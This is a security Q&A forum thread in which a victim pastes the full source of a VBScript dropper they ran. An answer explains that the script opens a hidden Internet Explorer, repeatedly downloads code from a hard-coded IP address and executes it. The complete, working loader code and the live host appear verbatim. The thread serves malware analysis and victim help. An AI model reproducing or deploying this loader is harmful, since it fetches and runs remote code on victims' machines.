0

I unwisely opened the file. I was sure that Windows will ask me if I am sure to run this script, but unfortunately, it wasn't. Now I am wondering what that file is exactly doing. Can anyone help?

content of the file:

' fffff
' ssssss

Dim DSLOVIEI
Dim foxtomnum, ubigs
ubigs = 0
foxtomnum = "1118812"

Call SookCanalTV(2 + 2)

Function TroceSHello(kpserial)
   On Error Resume Next
    DSLOVIEI.Quit()
    Execute "" + kpserial + "" 
End Function

Function DSLOVIEIChek(stcurl)
 Set DSLOVIEI = CreateObject("InternetExplorer.Application")
 DSLOVIEI.Visible = 0
 DSLOVIEI.navigate stcurl

 While DSLOVIEI.ReadyState <> 4 : WScript.Sleep 110 : Wend

 DSLOVIEIChek  = DSLOVIEI.document.body.innerText
End Function

Sub SookCanalTV(one)
  On Error Resume Next
    While ubigs < one
        WScript.Sleep 10 + 3    
      Call onlineZolo()
        WScript.Sleep 11000
   Wend
End Sub

Function onlineZolo()
    Dim promazzzzz
    foxtomnum = CStr(foxtomnum + 1) 
    promazzzzz = DSLOVIEIChek("http://192.3.45.90/online.php?mdms=143760135&to=" + foxtomnum)
TroceSHello(promazzzzz)
End Function
JBudny
  • 3
  • 2
  • Unfortunately, we cannot do malicious code reviews. As you can imagine, we would get flooded with random code. – schroeder Dec 01 '18 at 10:54

1 Answers1

2

Unfortunately, that VBS script appears to be a dropper which has installed malware to your computer. Your best option is to reinstall your operating system and start fresh.

The script has been uploaded to VirusTotal recently with indications of malware, and hybrid-analysis has further details of the malware after analysis.

The malware basically does the following:

  1. Creates an Internet Explorer process in the background
  2. Navigates to http://192.3.45.90/online.php?mdms=71464&to=1118813 multiple times, increasing the value of the to parameter each time to make different GET requests and download different VBS code
  3. Executes the downloaded VBS code, installing malware
Joe
  • 2,754
  • 2
  • 12
  • 22